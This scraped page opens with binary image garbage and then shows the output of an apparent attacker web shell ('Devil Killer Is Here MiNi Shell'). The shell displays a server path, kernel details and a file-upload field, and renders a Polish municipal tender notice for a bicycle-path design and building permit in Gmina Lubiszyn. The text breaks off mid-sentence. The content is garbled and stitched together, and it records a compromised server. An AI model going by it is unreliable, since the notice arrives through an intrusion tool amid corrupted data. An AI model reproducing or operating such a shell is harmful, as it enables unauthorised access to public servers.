JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250623/0028806501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę dla ścieżki rowerowej w Gminie Lubiszyn </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LUBISZYN</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Gmina Lubiszyn</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210966817</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Jedności Robotniczej 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubiszyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-433</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL431 - Gorzowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 727 71 30</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.ratajczak@lubiszyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubiszyn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę dla ścieżki rowerowej w Gminie Lubiszyn </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0196f19c-9235-4c91-a6ea-2ddf4f02ab55</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00288065</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-06-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00021836/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.8 Opracowanie dokumentacji projektowej ścieżki rowerowej dla celów komunikacyjnych Gminy Lubiszyn</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Lubuskiego 2021-2027 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lubiszyn.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://lubiszyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem https://lubiszyn.logintrade.net/rejestracja/przetargi.html zwanej dalej Platformą<br/>2.	Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcjami korzystania z Platformy zakupowej. Instrukcja jest zamieszczona bezpośrednio na ww. Platformie.<br/>3.	Specyfikację połączenia oraz niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie tj.:<br/>1)	Dopuszczalne przeglądarki internetowe:<br/>1.	Edge<br/>2.	Google Chrome<br/>3.	Mozilla Firefox<br/>4.	Opera;<br/>2)	Pozostałe wymagania techniczne:<br/>a)	dostęp do sieci internet<br/>b)	obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/>c)	włączona obsługa JavaScript<br/>d)	zalecana szybkość łącza internetowego powyżej 500 KB/s<br/>e)	zainstalowany Acrobat Reader<br/>f)	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>4.	Zamawiający wskazuje dopuszczalne formaty przesyłanych plików, w szczególności: JPG .js .tif .dwg .dfx .ods .odt .pdf .xls .txt .doc .ico .bmp .zip .gif .jpg .png .css .php .htm .jpeg. <br/>5.	Informacje na temat kodowania i czasu odbioru danych tj.: plik załączony przez Wykonawcę na Platformie i zapisany, widoczny jest w Systemie, jako zaszyfrowany. Możliwość otwarcia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>6.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego tel. +48 71 787-37-57 lub 71 787-35-34; pn-pt, 8.00-16.00 e-mail: helpdesk@logintrade.net<br/>7.	Korespondencja kierowana do Zamawiającego powinna być opatrzona numerem postępowania, tj. Sprawa nr RIT.271.4.04.2025<br/>8. Korzystanie z Platformy jest bezpłatne.<br/>9.	Wszelką korespondencję związaną z niniejszym postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za przekazaną w terminie, jeżeli dotrze do zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej.<br/>10.	Osoby wskazane do porozumiewania się z wykonawcami<br/>p. Jolanta Ratajczak<br/>tel. 95 727 71 46<br/>W zakresie dotyczącym przedmiotu zamówienia Wykonawca zobowiązany jest kontaktować się wyłączne drogą elektroniczną poprzez Platformę Zakupową Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie <br/>o ochronie danych) (Dz. Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie <br/>z przepisami krajowymi.<br/>2.	Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego pn. „Sporządzenie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę dla ścieżki rowerowej w Gminie Lubiszyn”<br/>3.	Administratorem danych osobowych jest Gmina Lubiszyn z siedzibą Lubiszynie pod adresem: Plac Jedności Robotniczej 1 66-433 Lubiszyn tel. 095 727 71 30<br/>4. Kontakt z inspektorem ochrony danych osobowych możliwy jest pod adresem: inspektor@cbi24.pl<br/>5.	Odbiorcami przekazanych przez wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art. 8 oraz art. 96 ust. 3 ustawy Pzp, a także art. 6 ustawy z 6 września 2001 r. o dostępie do informacji publicznej. <br/>6.	Dane osobowe wykonawcy zawarte w protokole postępowania będą przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>7.	Zamawiający nie planuje przetwarzania danych osobowych wykonawcy w celu innym niż cel określony w pkt 2 powyżej. Jeżeli administrator będzie planował przetwarzać dane osobowe w celu innym niż cel, w którym dane osobowe zostały zebrane (tj. cel określony w pkt 2 powyżej), przed takim dalszym przetwarzaniem poinformuje on osobę, której dane dotyczą, o tym innym celu oraz udzieli jej wszelkich innych stosownych informacji, o których mowa w art. 13 ust. 2 RODO.<br/>8.	Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich obowiązków formalno-prawnych wymaganych przez RODO <br/>i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:<br/>-	obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te wykonawca bezpośrednio pozyskał i przekazał zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego;<br/>-	obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane wykonawca pozyskał w sposób pośredni, a które to dane wykonawca przekazuje zamawiającemu w treści oferty lub dokumentów składanych na żądanie zamawiającego.<br/>8. W celu zapewnienia, że wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem w postępowaniu, wykonawca składa oświadczenia o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO – treść oświadczenia została zawarta w formularzu ofertowym.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1.	Zamawiający informuje, że:<br/>-	Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO (dane osobowe dotyczące wyroków skazujących i czynów zabronionych) w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu na ich wniesienie.<br/>-	Udostępnianie protokołu i załączników do protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem tych, o których mowa w art. 9 ust. 1 RODO (tj. danych osobowych ujawniających pochodzenie rasowe lub etniczne, poglądy polityczne, przekonania religijne lub światopoglądowe, przynależność do związków zawodowych oraz przetwarzania danych genetycznych, danych biometrycznych w celu jednoznacznego zidentyfikowania osoby fizycznej lub danych dotyczących zdrowia, seksualności lub orientacji seksualnej tej osoby), zebranych w toku postępowania o udzielenie zamówienia.<br/>-	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 RODO (związanych <br/>z prawem wykonawcy do uzyskania od administratora potwierdzenia, czy przetwarzane są dane osobowe jego dotyczące, prawem wykonawcy do bycia poinformowanym <br/>o odpowiednich zabezpieczeniach, o których mowa w art. 46 RODO, związanych <br/>z przekazaniem jego danych osobowych do państwa trzeciego lub organizacji międzynarodowej oraz prawem otrzymania przez wykonawcę od administratora kopii danych osobowych podlegających przetwarzaniu), zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>-	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia, o którym mowa <br/>w art. 16 RODO (z uprawnienia do sprostowania lub uzupełnienia danych osobowych), nie może naruszać integralności protokołu postępowania oraz jego załączników.<br/>-	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>-	W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 RODO spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania <br/>o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 rozporządzenia 2016/679.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIT.271.4.04.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Do obowiązków wykonawcy należy sporządzenie kompletnej	dokumentacji projektowo-wykonawczej wraz z uzyskaniem decyzji o pozwoleniu na budowę/zgłoszenie zamiaru wykonania robót, w tym m.in.:<br/>a)	wykonanie mapy do celów projektowych (lub zasadniczej z domiarami w przypadku zgłoszenia robót) wraz zapisem na cyfrowym nośniku np.: plyta CD, pamięć flash (*.dxf) — 1 egz.;<br/>b)	zamawiający zastrzega, że wykonawca w ramach zamówienia zobowiązany jest do ustalenia prawidłowego przebiegu granic działek drogowych oraz pozostałych, lub dokonania czynności formalnych umożliwiających usankcjonowanie prawne przebiegu ścieżki rowerowej, które każdorazowo musi uzgodnić z zamawiającym; <br/>c)	z uwagi na projektowanie ścieżki rowerowej na działkach należących do Starostwa Powiatowego, uzgodnienie w/w przedsięwzięcia ze Starostwem Powiatowym z siedzibą w Gorzowie Wlkp., w tym wykonawca zobowiązany jest do uzyskania zgody ze Starostwa Powiatowego na dysponowanie nieruchomościami na cele budowlane, w tym wykonanie prac projektowych na działkach uwzględniających przebieg planowanej ścieżki rowerowej; Zamawiający posiada zgodę ze strony Starostwa Powiatowego na realizację przedsięwzięcia będącego przedmiotem zamówienia. Wykonawca jest zobowiązany do uzyskania dokumentów niezbędnych do ubiegania się o pozwolenie na budowę /zgłoszenie zamiaru wykonania robót<br/><br/>d)	wykonawca przedstawi koncepcję planu zagospodarowania terenu, podlegającą uzgodnieniu i zatwierdzeniu przez Zamawiającego i na jej podstawie będzie kontynuował prace projektowe, z uwzględnieniem usunięcia wszelkich kolizji, które mogą potencjalnie wystąpić podczas realizacji przedmiotowego przedsięwzięcia,<br/>e)	w przypadku występowania przepustów drogowych - w przypadku konieczności ich wydłużenia / przebudowy – zaprojektowanie przebudowy przepustów.<br/><br/>2) Uzyskanie akceptacji Zamawiającego dla wykonanej dokumentacji projektowej przed złożeniem wniosku o przyjęcie zgłoszenia budowy lub innych robót budowlanych lub uzyskania decyzji o pozwoleniu na budowę. <br/>3) Wykonawca zobowiązany jest do uzyskania we własnym zakresie i na własny koszt wszelkich wymaganych opinii, warunków, decyzji, uzgodnień dokumentacji, w tym decyzji środowiskowej, warunków zabudowy, pozwolenia wodnoprawnego (jeżeli jest wymagane) na potrzeby sporządzenia kompletnej dokumentacji projektowej.<br/>4) Opracowanie Dokumentacji Projektowej przez Wykonawcę winno być wykonane zgodnie <br/>z aktualnymi przepisami, normami i zasadami wiedzy technicznej obowiązującym w dniu przekazania dokumentacji Zamawiającemu.<br/>Wykonawca, przy opracowywaniu Dokumentacji Projektowej, zobowiązuje się:<br/>a)	zastosować optymalne rozwiązania konstrukcyjne, materiałowe i kosztowe, w celu uzyskania nowoczesnych i właściwych standardów dla tego typu zadania inwestycyjnego, które ma być w oparciu o nią wykonane,<br/>b)	ponieść wszelkie opłaty za pozyskiwane w ramach realizacji dokumentacji projektowej decyzje, uzgodnienia i opinie,<br/>c)	opracować dokumentację projektową kompletną z punktu widzenia zadania inwestycyjnego, które ma być wykonane na jej podstawie, spójnej i skoordynowanej we wszystkich specjalnościach, a w szczególności posiadającej niezbędne uzgodnienia,<br/>d)	przedstawić wszystkie projektowe rozwiązania szczegółowe w zakresie umożliwiającym realizację zadania inwestycyjnego, które ma być wykonane na jej podstawie,<br/>e)	wykonawca zaprojektuje wykonanie robót z uwzględnieniem minimalnych wymagań określonych w ustawie z dnia 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami, przyjęte przez wykonawcę rozwiązania powinny być zaprojektowane uniwersalnie, z uwzględnieniem potrzeb różnych użytkowników, <br/>w tym użytkowników z niepełnosprawnościami.<br/>5) Wskazywane w dokumentacji projektowej, będącej przedmiotem umowy, materiały, urządzenia i inne elementy powinny być opisywane za pomocą parametrów technicznych, funkcjonalnych, użytkowych, itp., tzn. bez podawania znaków towarowych, patentów czy pochodzenia. Jeżeli konieczne będzie wskazanie znaku towarowego/patentu/pochodzenia jakiegoś materiału, urządzenia itd. (co jest dopuszczalne tylko w przypadkach dopuszczonych ustawą Prawo zamówień publicznych) to do każdego takiego przypadku Wykonawca zobowiązany jest uzyskać pisemną zgodę Zamawiającego na użycie znaku towarowego/patentu/pochodzenia i dołączyć do dokumentacji szczegółowe, obiektywne uzasadnienie użycia w danym przypadku znaku towarowego/patentu/pochodzenia, na którym uzyska stosowną, pisemną zgodę Zamawiającego. W takich przypadkach należy wskazać co najmniej dwa materiały/urządzenia, itd. i zaznaczyć że jest to tylko przykład, pisząc jednocześnie, że dopuszcza się produkty równoważne. Oprócz dopuszczenia równoważności Wykonawca zobowiązany jest również do podania wszystkich wymaganych parametrów materiału/urządzenia itd., które pozwolą następnie ocenić równoważność zaproponowanego przez wykonawcę robót budowlanych lub dostawcę wyposażenia materiału/urządzenia itd. W przypadku zakwestionowania, przez którąś z instytucji kontrolujących postępowania prowadzone w oparciu o przedmiot niniejszej umowy, zasadności użycia przez Wykonawcę znaku towarowego/patentu/pochodzenia materiału/urządzenia itd., i uznania takiego użycia za niezgodnego z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych ( Dz.U.2024.1320 t.j. Wykonawca poniesie wszelkie finansowe koszty wynikające z takiego zakwestionowania – zrefinansuje Zamawiającemu wszelkie nałożone na Zamawiającego korekty i kary wynikające ze wskazania w dokumentacji projektowej, będącej przedmiotem umowy, znaków towarowych, patentów lub pochodzenia materiału, urządzenia, itd. Obowiązek zrefinansowania przez Wykonawcę kar nałożonych w ww. okolicznościach dotyczy także sytuacji gdy Zamawiający wyrazi zgodę na użycie znaku towarowego/patentu/pochodzenia jakiegoś materiału, urządzenia, itd., a instytucja kontrolująca zakwestionuje przygotowane przez Wykonawcę uzasadnienie użycia znaku towarowego/patentu/pochodzenia jakiegoś materiału, urządzenia, itd.<br/>Wykonawca zrealizuje prace projektowe na swój koszt i ryzyko.<br/>2. Zakres dokumentacji projektowej:<br/>1)	Mapa do celów projektowych - 1 egz.,<br/>2)	Badania geologiczne w ciągu projektowanej drogi rowerowej - 1 kpl.,<br/>3)	Projekt zagospodarowania terenu (branża drogowa, mostowa, elektryczna, telekomunikacyjna) - 3 egz.,<br/>4)	Projekt architektoniczno - budowlany (branża drogowa, mostowa, elektryczna, telekom.) - 3 egz.,<br/>5)	Projekt techniczny (branża drogowa, mostowa, elektryczna, telekomunikacyjna) - 3 egz.,<br/>6)	Projekty budowlano - wykonawcze na usunięcie wszelkich kolizji sieciowych, których konieczność wykonania zostanie stwierdzona przez ZUD - 3 egz., <br/>7)	Projekt stałej organizacji ruchu wraz ze wszystkimi uzgodnieniami - 2 egz.,<br/>8)	Projekt wycinki kolidującej zieleni z projektowanym przedsięwzięciem, w tym jej inwentaryzacja - 2 egz.,<br/>9)	Uzyskanie decyzji zezwalającej na wycinkę kolidującej zieleni - 1 egz.,<br/>10)	Specyfikacja techniczna wykonania i odbioru robót - 1 egz.,<br/>11)	Kosztorys inwestorski - po 2 egz. dla każdego z 4 etapów realizacyjnych,<br/>12)	Przedmiary - po 2 egz. dla każdego z 4 etapów realizacyjnych,<br/>13)	Uzyskanie wszelkich ekspertyz, opinii, uzgodnień i decyzji niezbędnych do otrzymania: ostatecznej decyzji zatwierdzającej projekt budowlany i wydającej pozwolenie na budowę / skutecznego zgłoszenia robót nie wymagających pozwolenia na budowę / decyzji zezwolenia na realizację inwestycji drogowej (ZRID) - 1 kpl.,<br/>14)	Uzyskanie decyzji pozwolenia na budowę/skutecznego zgłoszenia robót nie wymagających pozwolenia na budowę lub w przypadku konieczności zaprojektowania drogi rowerowej poza pasem drogowym - uzyskanie decyzji zezwolenia na realizację inwestycji drogowej (ZRID), - 1 egz.<br/>15)	Wersja elektroniczna dokumentacji (dopuszczalne formaty *pdf, *jpg*.dxf, *.dwg,*.rtf, *.doc,), w tym kosztorysy i przedmiary z uwzględnieniem zapisów w pkt 1 lit. d) w formacie ath - 1 egz.<br/><br/>4. Wykonawca uczestniczący w opracowywaniu Dokumentacji projektowej, bezterminowo zobowiązuje się do przekazania wszelkich praw autorskich do sporządzonej przez siebie dokumentacji projektowej Zamawiającemu. <br/>5.	Sporządzona dokumentacja projektowa musi uwzględniać wytyczne wynikające z następujących dokumentów strategicznych województwa lubuskiego tj:<br/><br/>1)	zgodność projektu z przebiegiem głównych tras rowerowych województwa lubuskiego określonych w Polityce Rowerowej Województwa Lubuskiego 2030. Program Rozwoju Mobilności Rowerowej przyjęta Uchwałą Zarządu Województwa Lubuskiego Nr 230/3146/21 z dnia 16 grudnia 2021 r. <br/><br/>Wykonawca zobowiązany jest w ramach realizacji przedmiotu zamówienia do uzyskania opinii Departamentu Infrastruktury Transportowej Urzędu Marszałkowskiego Województwa Lubuskiego, dla sporządzonej dokumentacji, iż inwestycja spełnia założenia i cele dokumentu pn: „Polityka Rowerowa Województwa Lubuskiego2030 Program Rozwoju Mobilności 